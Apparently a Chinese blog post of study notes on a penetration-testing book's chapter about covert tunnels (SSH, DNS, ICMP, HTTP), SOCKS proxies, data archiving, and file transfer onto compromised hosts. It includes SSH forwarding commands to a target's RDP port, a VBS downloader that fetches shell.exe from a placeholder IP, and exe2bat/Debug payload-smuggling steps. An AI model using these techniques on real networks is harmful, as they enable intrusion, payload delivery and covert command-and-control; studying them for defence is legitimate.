目录
前言一、基础知识1、概述2、判断内网的连通性二、网络层隧道技术1、IPv6隧道2、ICMP隧道三、传输层隧道技术四、应用层隧道技术1、SSH隧道2、HTTP/HTTPS隧道3、DNS隧道五、SOCKS代理六、压缩数据1、rar.exe2、7-zip七、上传和下载1、VBS2、Debug上传3、其他结语前言
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,是第三章隐藏通信隧道技术,详细介绍了IPv6隧道、ICMP隧道、HTTPS隧道、SSH隧道、DNS隧道等加密隧道的使用方法,并对常见的SOCKS代理工具及内网上传/下载方法进行了解说
相关知识之前也有过学习整理,参见:内网渗透系列:内网穿透(隧道)学习
一、基础知识
1、概述
网络隐藏通信隧道是与目标主机进行信息传输的主要工具
在大量TCP、UDP通信被防御系统拦截的情况下,DNS、ICMP等难以禁用的协议已经被攻击者利用,成为攻击者控制隧道的主要通道
常用隧道:
网络层:IPv6隧道、ICMP隧道、GRE隧道传输层:TCP隧道、UDP隧道、常规端口转发应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道
2、判断内网的连通性
判断方法如下:
//ICMP协议ping //TCP协议nc -zv 192.168.1.10 80//HTTP协议curl :80//curl的代理模式curl -x proxy-ip:port //DNS协议//windows下的nslookupmslookup vps-ip//linux下的digdig @vps-ip
二、网络层隧道技术
1、IPv6隧道
IPv6隧道可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中
几种工具:
socat6tunnelnt6tunnel
2、ICMP隧道
在一般的通信协议中,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要
可参见:内网渗透系列:内网隧道之ICMP隧道
三、传输层隧道技术
主要是TCP隧道、UDP隧道和常规端口转发,大部分都会被拦截
工具可以参见:内网渗透系列:内网穿透(隧道)学习
四、应用层隧道技术
1、SSH隧道
几乎所有的Linux/UNIX服务器和网络设备都支持SSH协议,SSH协议是被允许通过防火墙和边界设备的,所以经常被攻击者利用
//本地转发ssh -CfNg -L 1153(VPS端口):1.1.1.10(目标IP):3389(目标端口)root@192.168.1.11(跳板机)//远程转发ssh -CfNg -R 3307(VPS端口):1.1.1.10(目标IP):3389(目标端口)root@192.168.1.4
-L本地端口转发,-R远程端口转发,-D动态转发(SOCKS代理)**
防御:
IP白名单ACL限制请求IP设置系统完全使用带外管理
2、HTTP/HTTPS隧道
reGeorg、meterpreter、tunna等,都很有名
3、DNS隧道
DNS是一个必不可少的服务,DNS报文本身具有穿透防火墙的能力。
从DNS协议的角度看,只是在一次次的查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实返回的是任意字符串,包括加密的C2指令。
DNS隧道本质是将其他协议封装在DNS协议中进行传输。
参见:内网渗透系列:内网隧道之DNS隧道
五、SOCKS代理
SOCKS是"SOCKetS"的缩写
SOCKS4只支持TCP协议SOCKS5不仅支持TCP/UDP协议,还支持各种身份验证机制
SOCKS代理更底层,是在会话层;而HTTP代理是在应用层。因此SOCKS代理可以代理一切客户端的连接,而HTTP代理只能代理使用HTTP协议的客户端。由于更底层,不需要处理高级协议的细节,所以SOCKS代理更快。
SOCKET被称作"套接字",用于描述IP地址和端口,是一个通信链的句柄,可以用来实现不同计算机之间的通信,它的本质是编程接口(API),是对TCP/IP的封装。SOCKS是一个代理协议,目前最新版本为SOCKS5,所谓代理就是,你可以通过它的去间接的访问网络,相当于一个中转站。区别:SOCKET是一个API,一个工具,让你建立网络连接用的。SOCKS是协议,是一组数据结构。
目前VPN隧道协议主要有4种:点到点隧道协议PPTP、第二层隧道协议L2TP、网络层隧道协议IPSec以及SOCKS v5协议。其中,PPTP和L2TP工作在数据链路层,IPSec工作在网络层,SOCKS v5工作在会话层。
e.g. EarthWorm(ew、新版本Termite)、reGeorg、sSocks、SocksCap64(SSTap)、Proxifier、ProxyChains
六、压缩数据
1、rar.exe
将E:\webs\目录下的所有内容打包为1.rar放入E:\webs\目录下
rar.exe a -k -r -s -m3 E:\webs\1.rar E:\webs\
将E:\webs\1.rar解压到当前根目录下
rar.exe e E:\webs\1.rar
分卷压缩E盘API目录下的所有文件及文件夹,设置每个分卷为20M
rar.exe a -m0 -r -v20m E:\test.rar E:\API
将E:\test.part01.rar解压到E盘的x1目录下
rar.exe x E:\test.part01.rar E:\x1
2、7-zip
将E:\webs\目录下的所有内容打包为1.7z放入E:\webs\目录下
7z.exe a -k -r -p12345 E:\webs\1.7z E:\webs\
将E:\webs\1.7z解压到当前根目录下
7z.exe e -p12345 E:\webs\1.7z
分卷压缩E盘API目录下的所有文件及文件夹,设置每个分卷为20M
7z.exe -r -vlm -padmin a E:\test.7z E:\API
将E:\test.part01.7z解压到E盘的x1目录下
7z.exe x -padmin E:\test.7z.001 -oE:\x1
七、上传和下载
1、VBS
执行下面命令即可在目标主机上下载shell.exe文件
Cscript download.vbs
download.vbs代码:
Set Post=CreateObject("Msxml2.XMLHTTP")Set shell = CreateObject("Wscript.Shell")post.Open "GET","http://IP/shell.exe",0post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()aGet.Write(post.responseBody)aGet.SaveToFile "C:\test\shell.exe",2
2、Debug上传
先将需要上传的EXE文件转换为十六进制HEX的形式,再通过echo命令将HEX代码写人文件,最后利用Debug功能将HEX代码编译并还原成EXE文件
在KaliLlnux中,exe2bat.exe工具位于/usr/share/windows-binaries目录,执行
wine exe2bat.exe ew.exe ew.txt
将ew.exe转换为ew.txt
然后,利用目标服务器的Debug功能将HEX代码还原为EXE文件
再使用echo命令将ew.txt里面的代码复制到目标系统的命令行环境中
3、其他
还可以用以下这些上传文件:
Nishang:利用Nishang将上传的EXE文件转换为十六进制的形式,然后使用echo命令访问目标服务器,最后使用Download_Execute脚本下载文本文件并将其转换为EXE文件bitsadmm:推荐在Windows7和Windows8主机上使用,注意它不支持HTTPS和FTP协议,也不支持WindowsXP/Sever及以前的版本PowerShell下载
结语
本章主要是隐匿通信隧道,由于这部分知识之前有过学习,故此处就不详细记录了,具体可见博客其他相关文章